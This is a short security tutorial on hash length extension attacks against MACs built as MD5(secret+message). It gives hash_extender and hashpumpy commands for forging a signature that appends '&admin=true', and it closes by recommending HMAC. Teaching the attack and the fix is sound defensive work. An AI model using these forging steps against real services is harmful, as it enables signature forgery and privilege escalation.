Hash Length Extension
Attack
Hash length extension attacks exploit the Merkle–Damgård construction in hashes like MD5, SHA-1, and SHA-256. If H(secret||message) is used as a MAC, attackers can compute H(secret||message||padding||extension).
Vulnerable Construction
text
# Vulnerable MAC scheme
# signature = MD5(secret + message)
# Server verifies:
# - Takes user-provided message
# - Computes MD5(secret + message)
# - Compares with user-provided signature
# Attacker knows:
# - message (e.g., "user=guest")
# - signature = MD5(secret + "user=guest")
# - Does NOT know secret
# Attacker can compute:
# - MD5(secret + "user=guest" + padding + "&admin=true")
# - Without knowing the secret!Exploitation with hash_extender
bash
# Install hash_extender
git clone https://github.com/iagox86/hash_extender
cd hash_extender && make
# Usage
./hash_extender \
--data "user=guest" \
--secret-min 8 --secret-max 16 \
--append "&admin=true" \
--signature 5d41402abc4b2a76b9719d911017c592 \
--format md5
# Output includes new signature and extended data
# Try each possible secret length
# Python alternative: hashpumpy
pip install hashpumpy
import hashpumpy
new_sig, new_data = hashpumpy.hashpump(
original_sig, # Known signature
original_data, # Known data
data_to_add, # Extension
secret_length # Guessed length
)Fix: Use HMAC
Never use H(secret||message) as a MAC. Use HMAC-SHA256 which is not vulnerable
to length extension attacks.